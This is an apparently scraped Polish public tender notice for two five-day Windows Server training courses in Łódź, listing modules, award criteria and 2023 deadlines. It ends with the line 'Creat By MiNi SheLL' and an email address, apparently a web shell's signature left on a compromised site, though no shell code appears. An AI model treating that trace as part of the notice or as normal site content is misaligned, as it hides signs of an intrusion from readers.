Szkolenie MS 55371 Windows Server Administration <br/>Program szkolenia uwzględnia w szczególności<br/>Moduł 1: Wprowadzenie do administracji systemu Windows Server<br/>• Wprowadzenie do systemu Windows Server<br/>• Wprowadzenie do systemu Windows Server Core<br/>• Wprowadzenie do zasad i narzędzi administracyjnych systemu Windows Server<br/>• Ćwiczenie: Wdrażanie i konfiguracja systemu Windows Server<br/> o Wdrażanie i konfiguracja systemu Server Core<br/> o Wdrażanie i stosowanie zdalnej administracji serwerami<br/>Po ukończeniu tego modułu uczestnicy będą w stanie:<br/>• Opisać system Windows Server, a także techniki wdrażania, serwisowania i aktywacji,<br/>• Opisać system Windows Server Core, przedstawić jego specyfikę i sposoby administrowania nim.<br/> <br/>Moduł 2: Usługi zarządzania tożsamością w systemie Windows Server<br/><br/>• Wprowadzenie do AD DS<br/>• Wdrażanie kontrolerów domeny Windows Server<br/>• Wprowadzenie do usługi Azure AD<br/>• Wdrażanie zasad grupy<br/>• Wprowadzenie do usług certyfikatów Active Directory<br/>• Ćwiczenie: Wdrażanie usług zarządzania tożsamością i zasad grupy<br/> o Wdrażanie nowego kontrolera domeny w systemie Server Core<br/> o Konfigurowanie zasad grupy<br/> o Wdrażanie i korzystanie z usług certyfikatów<br/> o Wyjaśnienie podstaw zasad grupy i konfiguracja GPO w środowisku domenowym<br/> o Opis roli usług certyfikatów Active Directory i korzystanie z certyfikatów<br/>Po ukończeniu tego modułu uczestnicy będą w stanie:<br/>• Opisać AD DS w środowisku systemu Windows Server,<br/>• Wdrażać kontrolery domeny w AD DS,<br/>• Opisać Azure AD i korzyści płynące z integracji Azure AD z AD DS.<br/>Moduł 3: Usługi infrastruktury sieciowej w systemie Windows Server<br/><br/>• Wdrażanie i zarządzanie protokołem DHCP<br/>• Wdrażanie i zarządzanie systemem DNS<br/>• Wdrażanie i zarządzanie systemem IPAM<br/>• Usługi dostępu zdalnego w systemie Windows Server<br/>• Ćwiczenie: Wdrażanie i konfiguracja usług infrastruktury sieciowej w systemie<br/>Windows Server<br/> o Wdrażanie i konfiguracja protokołu DHCP<br/> o Wdrażanie i konfiguracja systemu DNS<br/> o Wdrażanie serwera proxy aplikacji sieci WWW<br/>Po ukończeniu tego modułu uczestnicy będą w stanie:<br/>• Opisać, wdrożyć i skonfigurować usługę DHCP,<br/>• Wdrażać, konfigurować i zarządzać systemem DNS,<br/>• Opisać, wdrożyć i zarządzać systemem IPAM.<br/><br/>Moduł 4: Serwery plików i zarządzanie pamięcią masową w systemie Windows<br/>Server<br/>• Woluminy i systemy plików w systemie Windows Server<br/>• Wdrażanie udostępniania w systemie Windows Server<br/>• Wdrażanie rozwiązania Storage Spaces (przestrzeni dyskowych) w systemie Windows<br/>Server<br/>• Wdrażanie deduplikacji danych<br/>• Wdrażanie interfejsu iSCSI<br/>• Wdrażanie rozproszonego systemu plików<br/>• Ćwiczenie: Wdrażanie rozwiązań pamięci masowej w systemie Windows Server<br/> o Wdrażanie deduplikacji danych<br/> o Konfiguracja magazynu iSCSI<br/> o Konfiguracja nadmiarowych przestrzeni dyskowych<br/> o Wdrażanie Storage Spaces Direct<br/>Po ukończeniu tego modułu uczestnicy będą w stanie:<br/>• Wdrażać udostępnianie w systemie Windows Server,<br/>• Wdrożyć technologię Storage Spaces,<br/>• Wdrażać funkcję deduplikacji danych,<br/>• Wdrażać pamięć masową opartą na iSCSI,<br/>• Wdrożyć i zarządzać rozproszonym systemem plików (DFS - Distributed File System).<br/><br/>Moduł 5: Wirtualizacja Hyper-V i kontenery w systemie Windows Server<br/><br/>• Hyper-V w systemie Windows Server<br/>• Konfiguracja maszyn wirtualnych /li&gt;<br/>• Zabezpieczanie wirtualizacji w systemie Windows Server<br/>• Kontenery w systemie Windows Server<br/>• Wprowadzenie do platformy Kubernetes<br/>• Ćwiczenie: Wdrażanie i konfiguracja wirtualizacji w systemie Windows Server<br/> o Tworzenie i konfigurowanie maszyn wirtualnych<br/> o Instalacja i konfiguracja kontenerów<br/>Po ukończeniu tego modułu uczestnicy będą w stanie:<br/>• Opisać kluczowe cechy Hyper-V w systemie Windows Server,<br/>• Opisać ustawienia maszyn wirtualnych oraz wdrożyć i skonfigurować maszyny<br/> wirtualne w Hyper-V,<br/>• Wyjaśnić zastosowanie technologii bezpieczeństwa w wirtualizacji,<br/>• Opisać i wdrożyć kontenery w systemie Windows Server,<br/>• Wyjaśnić zastosowanie platformy Kubernetes w systemie Windows.<br/><br/>Moduł 6: Wysoka dostępność w systemie Windows Server<br/><br/>• Planowanie wdrożenia klastra pracy awaryjnej<br/>• Tworzenie i konfiguracja klastra pracy awaryjnej<br/>• Wprowadzenie do rozciągniętych klastrów<br/>• Planowanie rozwiązań w zakresie wysokiej dostępności i odzyskiwania danych po awarii z wykorzystaniem maszyn wirtualnych funkcji Hyper-V<br/>• Ćwiczenie: Wdrażanie klastra pracy awaryjnej<br/> o Konfiguracja pamięci masowej i tworzenie klastra<br/> o Wdrażanie i konfiguracja serwera plików o wysokiej dostępności<br/> o Sprawdzanie poprawności wdrożenia serwera plików o wysokiej dostępności<br/>Po ukończeniu tego modułu uczestnicy będą w stanie:<br/>• Opisać klaster pracy awaryjnej i warunki jego wdrożenia,<br/>• Tworzyć i konfigurować klastry pracy awaryjnej,<br/>• Opisać klastry rozciągnięte,<br/>• Opisać opcje osiągania wysokiej dostępności za pomocą maszyn wirtualnych Hyper-V.<br/><br/>Moduł 7: Odzyskiwanie danych po awarii w systemie Windows Server<br/><br/>• Funkcja Hyper-V Replica	<br/>• Tworzenie kopii zapasowych i przywracanie infrastruktury w systemie Windows Server<br/>• Ćwiczenie: Wdrażanie funkcji Hyper-V Replica i Windows Server Backup<br/> o Wdrażanie funkcji Hyper-V Replica<br/> o Wdrażanie tworzenia kopii zapasowych i przywracania za pomocą narzędzia Windows Server Backup<br/>Po ukończeniu tego modułu uczestnicy będą w stanie:<br/>• Opisać i wdrożyć funkcję Hyper-V Replica,<br/>• Opisać usługę Azure Site Recovery,<br/>• Opisać i wdrożyć narzędzie Windows Server Backup,<br/>• Opisać usługę Azure Backup.<br/><br/>Moduł 8: Bezpieczeństwo systemu Windows Server<br/><br/>• Ochrona danych uwierzytelniających i dostępu uprzywilejowanego<br/>• Hardening systemu Windows Server<br/>• JEA w systemie Windows Server<br/>• Zabezpieczanie i analiza ruchu w SMB<br/>• Zarządzanie aktualizacjami w systemie Windows Server<br/>• Ćwiczenie: Konfiguracja zabezpieczeń w systemie Windows Server<br/> o Konfiguracja funkcji Windows Defender Credential Guard<br/> o Lokalizowanie problematycznych kont<br/> o Wdrażanie rozwiązania LAPS<br/>Po ukończeniu tego modułu uczestnicy będą w stanie:<br/>• Opisać dane uwierzytelniające wykorzystywane w systemie Windows Server,<br/>• Wyjaśnić, jak wdrożyć zabezpieczenia dostępu uprzywilejowanego,<br/>• Opisać metody i technologie hardeningu zabezpieczeń w systemie Windows Server,<br/>• Opisać i skonfigurować usługę Just Enough Administration (JEA),<br/>• Zabezpieczyć ruch SMB w systemie Windows Server,<br/>• Opisać usługę Windows Update oraz jej opcje wdrażania i zarządzania.<br/><br/>Moduł 9: RDS (usługi pulpitu zdalnego) w systemie Windows Server<br/><br/>• Wprowadzenie do RDS<br/>• Konfiguracja wdrażania pulpitu opartego na sesji<br/>• Wprowadzenie do osobistych i połączonych pulpitów wirtualnych<br/>• Ćwiczenie: Wdrażanie RDS w systemie Windows Server<br/> o Wdrażanie RDS<br/> o Konfigurowanie ustawień kolekcji sesji i wykorzystywanie RDC<br/> o Konfiguracja szablonu pulpitu wirtualnego<br/>Po ukończeniu tego modułu uczestnicy będą w stanie:<br/>• Opisać usługi Remote Desktop Services (RDS - usługi pulpitu zdalnego) w systemie<br/>Windows Server,<br/>• Opisać i wdrożyć pulpity oparte na sesji,<br/>• Opisać osobiste i połączone pulpity wirtualne.<br/><br/>Moduł 10: Dostęp zdalny i usługi internetowe w systemie Windows Server<br/> <br/>• Wdrażanie sieci VPN<br/>• Wdrażanie usługi Always On VPN<br/>• Wdrażanie systemu NPS<br/>• Wdrażanie serwera WWW w systemie Windows Server<br/>• Ćwiczenie: Wdrażanie obciążeń sieciowych<br/> o Wdrażanie sieci VPN w systemie Windows Server<br/> o Wdrażanie i konfiguracja serwera WWW<br/>Po ukończeniu tego modułu uczestnicy będą w stanie:<br/>• Opisać opcje sieci VPN w systemie Windows Server,<br/>• Opisać funkcję Always On VPN,<br/>• Opisać i skonfigurować NPS,<br/>• Opisać i skonfigurować serwer WWW (IIS).<br/><br/>Moduł 11: Monitorowanie serwera i wydajności w systemie Windows Server<br/> <br/>• Wprowadzenie do narzędzi do monitorowania systemu Windows Server<br/>• Korzystanie z monitora wydajności<br/>• Monitorowanie dzienników zdarzeń w celu rozwiązywania problemów<br/>• Ćwiczenie: Monitorowanie i rozwiązywanie problemów z systemem Windows Server<br/> o Ustanowienie bazowego poziomu wydajności<br/> o Identyfikacja źródła problemu z wydajnością<br/>Po ukończeniu tego modułu uczestnicy będą w stanie:<br/>• Opisać narzędzia monitorujące w systemie Windows Server,<br/>• Opisać monitorowanie wydajności i wykorzystać je w systemie Windows Server,<br/>• Opisać rejestrowanie zdarzeń i monitorować rejestrowanie zdarzeń dla celów<br/>rozwiązywania problemów.<br/><br/>Moduł 12: Aktualizacja i migracja w systemie Windows Server<br/><br/>• Migracja AD DS<br/>• Usługa migracji pamięci masowej<br/>• Narzędzia do migracji systemu Windows Server<br/>• Ćwiczenie: Migracja obciążeń serwera<br/> o Wdrażanie usługi migracji pamięci masowej<br/>Po ukończeniu tego modułu uczestnicy będą w stanie:<br/>• Opisać narzędzia, których należy użyć do migracji AD DS,<br/>• Opisać usługę migracji pamięci masowej,<br/>• Opisać narzędzia do migracji Windows Server i scenariusze ich użycia<br/><br/>Ilość uczestników – 3 osoby <br/>Czas trwania - 5 dni, po 8 godzin dziennie z przerwami 15 min.<br/>Szkolenie nie jest wyjazdowe. Siedziba Zamawiającego mieści się w Łodzi, szkolenie ma się odbyć w miejscu umożliwiającym dojazd środkami komunikacji miejskiej.<br/>Szkolenie powinien przeprowadzić autoryzowany trener MCT. <br/>Materiały szkoleniowe<br/>Uczestnicy szkoleń otrzymają materiały szkoleniowe, zawierające najważniejsze zagadnienia, które będą wykorzystane podczas szkolenia jak również będą stanowić pomoc po ich zakończeniu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 – Szkolenie MS 55343 Networking with Windows Server<br/>Program szkolenia uwzględnia w szczególności<br/><br/>Moduł 1: Planowanie i wdrażanie sieci IPv4<br/><br/>• Planowanie adresowania IPv4<br/>• Konfiguracja hosta IPv4<br/>• Zarządzanie połączeniem IPv4 i rozwiązywanie związanych z nim problemów<br/>• Ćwiczenia 1: Planowanie sieci IPv4<br/> o Migracja ustawień za pomocą narzędzia Łatwy transfer w systemie Windows<br/> o Konfiguracja obraz odniesienia systemu Windows 7<br/> o Konfiguracja obrazu odniesienia<br/>• Ćwiczenia 2: Planowanie sieci IPv4<br/> o Migracja ustawień za pomocą narzędzia Łatwy transfer w systemie Windows<br/> o Konfiguracja obraz odniesienia systemu Windows 7<br/> o Konfiguracja obrazu odniesienia<br/>• Ćwiczenia 3: Wdrażanie sieci IPv4 i rozwiązywanie problemów z nią<br/> o Weryfikacja IPv4<br/> o Rozwiązywanie problemów z IPv4<br/>• Ćwiczenia 4: Wdrażanie sieci IPv4 i rozwiązywanie problemów z nią<br/> o Weryfikacja IPv4<br/> o Rozwiązywanie problemów z IPv4<br/>Po ukończeniu tego modułu uczestnicy będą w stanie:<br/>• Planować adresowanie IPv4,<br/>• Skonfigurować hosta IPv4,<br/>• Zarządzać połączeniem IPv4 i rozwiązywać związane z nim problemy.<br/><br/>Moduł 2: Implementacja DHCP<br/><br/>• Omówienie roli serwera DHCP<br/>• Wdrażanie DHCP<br/>• Zarządzanie i rozwiązywanie problemów z DHCP<br/>• Ćwiczenia: Wdrażanie DHCP<br/> o Planowanie implementacji serwera DHCP<br/> o Implementacja konfiguracji DHCP<br/> o Weryfikacja implementacji DHCP<br/> o Po ukończeniu tego modułu uczestnicy będą w stanie:<br/> o Wyjaśnić rolę serwera DHCP.<br/> o Wdrożyć DHCP.<br/> o Zarządzać i rozwiązywać problemy z DHCP.<br/><br/>Moduł 3: Implementacja IPv6<br/><br/>• Omówienie adresowania IPv6<br/>• Konfiguracja hosta IPv6<br/>• Zapewnienie współistnienia IPv6 oraz IPv4<br/>• Przejście z IPv4 na IPv6<br/>• Ćwiczenia: Konfiguracja i ocena technologii służących do przejścia na IPv6<br/> o Przegląd domyślnej konfiguracji IPv6<br/> o Implementacja DHCPv6<br/> o Konfiguracja integracji sieciowej za pomocą ISATAP<br/> o Konfiguracja natywnej łączności IPv6<br/> o Konfiguracja łączności z użyciem protokołu 6to4<br/><br/>Moduł 4: Implementacja DNS<br/><br/>• Wdrażanie serwerów DNS<br/>• Konfiguracja stref w DNS<br/>• Konfiguracja rozpoznawania nazw między strefami DNS<br/>• Konfiguracja integracji DNS z usługami domenowymi Active Directory (AD DS)<br/>• Konfiguracja zaawansowanych ustawień DNS<br/>• Ćwiczenia 1: Planowanie i implementacja rozpoznawania nazw przy użyciu DNS<br/> o Planowanie rozpoznawania nazw przy użyciu DNS<br/> o Wdrażanie serwerów i stref DNS<br/>• Ćwiczenia 2: Integracja DNS z usługą Active Directory<br/> o Integracja DNS z Active Directory<br/>• Ćwiczenia 3: Konfiguracja zaawansowanych ustawień DNS<br/> o Konfiguracja polityki DNS<br/> o Weryfikacja implementacji DNS<br/> o Rozwiązywanie problemów z DNS<br/><br/>Moduł 5: Wdrażanie i zarządzanie usługą IPAM<br/> <br/>• Omówienie usługi IPAM<br/>• Wdrożenie usługi IPAM<br/>• Zarządzanie przestrzeniami adresowymi IP za pomocą IPAM<br/>• Ćwiczenia 1: Wdrażanie IPAM<br/> o Instalowanie funkcji serwera IPAM<br/> o Inicjowanie obsługi serwera IPAM<br/> o Zarządzanie przestrzeniami adresowymi IP za pomocą IPAM<br/>• Ćwiczenia 2: Wdrażanie IPAM<br/> o Instalowanie funkcji serwera IPAM<br/> o Inicjowanie obsługi serwera IPAM<br/> o Zarządzanie przestrzeniami adresowymi IP za pomocą IPAM<br/><br/>Moduł 6: Zdalny dostęp w Windows Server<br/> <br/>• Omówienie funkcji zdalnego dostępu<br/>• Implementacja serwera proxy aplikacji sieci Web<br/>• Ćwiczenia: Implementacja serwera proxy aplikacji sieci Web<br/> o Implementacja serwera proxy aplikacji sieci Web<br/> o Weryfikacja wdrożenia serwera proxy aplikacji sieci Web<br/><br/>Moduł 7: Implementacja funkcji DirectAccessv<br/><br/>• Omówienie funkcji DirectAccess<br/>• Implementacja funkcji DirectAccess z wykorzystaniem kreatora Wprowadzenie<br/>• Wdrażanie zaawansowanej infrastruktury DirectAccess i zarządzanie nią<br/>• Ćwiczenia 1: Implementacja funkcji DirectAccess z wykorzystaniem kreatora Wprowadzenie<br/> o Weryfikacja gotowości do wdrożenia funkcji DirectAccess<br/> o Konfiguracja funkcji DirectAccess<br/> o Weryfikacja wdrożenia funkcji DirectAccess<br/>• Ćwiczenia 2: Wdrażanie zaawansowanego rozwiązania DirectAccess<br/> o Przygotowanie środowiska dla funkcji DirectAccess<br/> o Wdrożenie zaawansowanej infrastruktury DirectAccess<br/> o Weryfikacja wdrożenia funkcji DirectAccess<br/><br/>Moduł 8: Implementacja sieci VPN<br/><br/>• Planowanie sieci VPN<br/>• Implementacja sieci VPN<br/>• Ćwiczenia: Implementacja sieci VPN<br/> o Implementacja sieci VPN<br/> o Weryfikacja wdrożenia sieci VPN<br/> o Rozwiązywanie problemów z dostępem do sieci VPN<br/><br/>Moduł 9: Uruchamianie usług sieciowych w oddziałach<br/><br/>Moduł 10: Uruchamianie usług sieciowych w oddziałach<br/><br/>• Usługi sieciowe i kwestie do rozpatrzenia w zakresie oddziałów<br/>• Wdrażanie rozproszonego systemu plików (DFS) w oddziałach<br/>• Implementacja usługi BranchCache w oddziałach<br/>• Ćwiczenia 1: Wdrażanie rozproszonego systemu plików w oddziałach<br/> o Wdrażanie rozproszonego systemu plików<br/> o Weryfikacja prawidłowego wdrożenia<br/>• Ćwiczenia 2: Implementacja usługi BranchCache<br/> o Implementacja usługi BranchCache<br/>▪ Weryfikacja prawidłowego wdrożenia<br/><br/>Moduł 11: Konfiguracja zaawansowanych funkcji sieciowych<br/><br/>Moduł 12: Konfiguracja zaawansowanych funkcji sieciowych<br/><br/>• Omówienie funkcji sieciowych o wysokiej wydajności<br/>• Konfiguracja zaawansowanych funkcji sieciowych Microsoft Hyper-V<br/>• Ćwiczenia: Konfiguracja zaawansowanych funkcji sieciowych funkcji Hyper-V<br/> o Tworzenie i używanie wirtualnych przełączników funkcji Hyper-V<br/> o Konfiguracja i korzystanie z zaawansowanych funkcji przełącznika wirtualnego<br/><br/>Moduł 13: Wdrażanie sieci definiowanych przez oprogramowanie<br/><br/>• Po ukończeniu tego modułu uczestnicy będą w stanie:<br/>• Opisać sieci definiowane przez oprogramowanie<br/>• Wdrożyć wirtualizację sieci<br/>• Wdrożyć kontroler sieci<br/>• Ćwiczenia 1: Wdrażanie kontrolera sieci<br/> o Przygotowanie do wdrożenia kontrolera sieci<br/> o Wdrażanie kontrolera sieci<br/>• Ćwiczenia 2: Wdrażanie kontrolera sieci<br/> o Przygotowanie do wdrożenia kontrolera sieci<br/> o Wdrażanie kontrolera sieci<br/><br/>Ilość uczestników – 3 osoby <br/>Czas trwania - 5 dni, po 8 godzin dziennie z przerwami 15 min.<br/>Szkolenie nie jest wyjazdowe. Siedziba Zamawiającego mieści się w Łodzi, szkolenie ma się odbyć w miejscu umożliwiającym dojazd środkami komunikacji miejskiej.<br/>Szkolenie powinien przeprowadzić autoryzowany trener MCT. <br/>Materiały szkoleniowe<br/>Uczestnicy szkoleń otrzymają materiały szkoleniowe, zawierające najważniejsze zagadnienia, które będą wykorzystane podczas szkolenia jak również będą stanowić pomoc po ich zakończeniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta składana jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym (zgodnie z wzorem formularza oferty – załącznik nr 1 do SWZ);<br/>2. Doświadczenie osoby wyznaczonej do realizacji zamówienia - do kryterium;<br/>3. Pełnomocnictwo o ile ofertę składa pełnomocnik;<br/>4. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia - jeżeli dotyczy; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W takim przypadku:<br/>• Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>• Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać za pośrednictwem platformy - Platformazakupowa.pl Strona postępowania: https://platformazakupowa.pl/pn/asp.lodz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-27 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-25</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com